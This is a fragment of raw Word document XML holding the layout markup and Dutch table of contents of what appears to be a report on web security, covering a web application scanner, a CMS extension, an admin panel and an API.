                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-78105</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>411480</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5905500" cy="688340"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="719" name="Text Box 719"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="59055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47543" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="006E0461">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787C0AB2" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A0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C3317" id="Text Box 719" o:spid="_x0000_s1037" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-6.15pt;margin-top:32.4pt;width:465pt;height:54.2pt;z-index:2531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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="36747543" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="006E0461">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787C0AB2" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2E3ABE" w14:textId="015AA507" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="907"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D79BA50" w14:textId="77777777" w:rsidR="00CA3CAE" w:rsidRDefault="00CA3CAE">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6356507D" w14:textId="5350B00D" w:rsidR="00CA3CAE" w:rsidRDefault="00F64E00" w:rsidP="00CA3CAE">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="907"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253332480" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3BBF07C3" wp14:editId="3A1F1BF7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-897820</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-607608</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="918" name="Rectangle 91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B1F7A" id="Rectangle 918" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.7pt;margin-top:-47.8pt;width:25pt;height:1031.7pt;z-index:-2499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" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ABCFE2" w14:textId="221D263D" w:rsidR="00CA3CAE" w:rsidRPr="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE"/>
    <w:p w14:paraId="58CA56BA" w14:textId="4AA0ABE0" w:rsidR="00CA3CAE" w:rsidRPr="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Inhoudsopgave</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47883F81" w14:textId="60A0A25F" w:rsidR="00CA3CAE" w:rsidRPr="00CA3CAE" w:rsidRDefault="00CA3CAE" w:rsidP="00CA3CAE">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253330432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7AFC395B" wp14:editId="7FA734A6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3100070</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>195580</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2921000" cy="7672705"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="917" name="Text Box 917"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2921000" cy="7672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40D9C6" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>5.5 API</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>75</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="08EF3D2D" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>5.6 Webapplicatie scanner</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>76</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5D0A9C52" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00353D0C" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00353D0C">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Eindconclusie</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00353D0C">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00353D0C">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00353D0C">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00353D0C">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                              <w:t>82</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7B1BDFBC" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>Bronnenlijst</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>83</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7763295A" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>Bijlage</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>84</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="32365DDA" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE"/>
                          <w:p w14:paraId="6ABB4D48" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3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C395B" id="Text Box 917" o:spid="_x0000_s1038" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:244.1pt;margin-top:15.4pt;width:230pt;height:604.15pt;z-index:2533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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2E40D9C6" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>5.5 API</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>75</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="08EF3D2D" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>5.6 Webapplicatie scanner</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>76</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5D0A9C52" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00353D0C" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00353D0C">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Eindconclusie</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00353D0C">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00353D0C">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00353D0C">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                      </w:r>
                      <w:r w:rsidRPr="00353D0C">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:tab/>
                        <w:t>82</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7B1BDFBC" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>Bronnenlijst</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>83</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7763295A" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:t>Bijlage</w:t>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                      </w:r>
                      <w:r>
                        <w:tab/>
                        <w:t>84</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="32365DDA" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE"/>
                    <w:p w14:paraId="6ABB4D48" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253329408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0278540A" wp14:editId="4A870D42">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-11430</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>196215</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2921000" cy="7660640"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="916" name="Text Box 916"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2921000" cy="7660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ED4E75" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t xml:space="preserve">1 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="006B0926">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Inleiding</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>7</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="57E790BE" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t xml:space="preserve">1.1 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:t>Aanleiding</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>7</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="69A8ADFD" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t xml:space="preserve">1.2 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:t>Probleemstelling</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>7</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0727A6B8" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t xml:space="preserve">1.3 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:t>Scope</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>9</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="17339239" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t xml:space="preserve">1.4 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:t>Onderzoek opzet</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>10</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="307D6315" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t xml:space="preserve">1.5 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:t>Project context</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>11</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="554EF651" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r w:rsidRPr="006B0926">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>2 Business Context</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>13</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="514C6B86" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t xml:space="preserve">2.1 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:t>Stakeholders en Business doelen</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>13</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7BC5D54F" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t xml:space="preserve">2.2 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:t>Doelgroep</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>17</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6F952B89" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r w:rsidRPr="00D96DB8">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>3 Onderzoek</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>23</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="48B42014" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t xml:space="preserve">3.1 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:t>Inleiding</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>23</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="413F7C1A" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t xml:space="preserve">3.2 </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:t>Web Security en de kwetsbaarheden</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:tab/>
                              <w:t>24</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3B88CD4F" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>3.3 Webapplicatie scanner</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="00886DD6">
                              <w:t>32</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0A391DB4" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>3.4 Technologie</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>39</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4C35393D" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="000826D9" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="000826D9">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>4 Concept</w:t>
                            </w:r>
                            <w:r w:rsidRPr="000826D9">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="000826D9">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="000826D9">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="000826D9">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                              <w:t>44</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="30E1B180" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>4.1 Concept van het systeem</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>45</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5D635B42" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>4.2 Pandora CMS Extensie</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>47</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="47B0D20F" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>4.3 Admin Paneel</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>49</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6577768B" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>4.4 API</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>50</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="330B9E52" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>4.5 Webapplicatie scanner</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>51</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5FC571E0" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="000826D9" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="000826D9">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>5 Eindproduct</w:t>
                            </w:r>
                            <w:r w:rsidRPr="000826D9">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="000826D9">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="000826D9">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                            </w:r>
                            <w:r w:rsidRPr="000826D9">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:tab/>
                              <w:t>66</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="34AE8028" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>5.1 Pandora CMS Extensie</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>67</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="257759F2" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>5.2 Admin Paneel</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>69</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6EC26377" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>5.3 Rapport</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>71</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="326EC22B" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                            <w:r>
                              <w:t>5.4 Email Service</w:t>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                            </w:r>
                            <w:r>
                              <w:tab/>
                              <w:t>73</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5E1BC1DD" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE"/>
                          <w:p w14:paraId="69E917BF" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3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8540A" id="Text Box 916" o:spid="_x0000_s1039" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-.9pt;margin-top:15.45pt;width:230pt;height:603.2pt;z-index:2533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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="11ED4E75" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRPr="00886DD6" w:rsidRDefault="002A05E5" w:rsidP="00CA3CAE">
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t xml:space="preserve">1 </w:t>
                      </w:r>
                      <w:r w:rsidRPr="006B0926">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Inleiding</w:t>
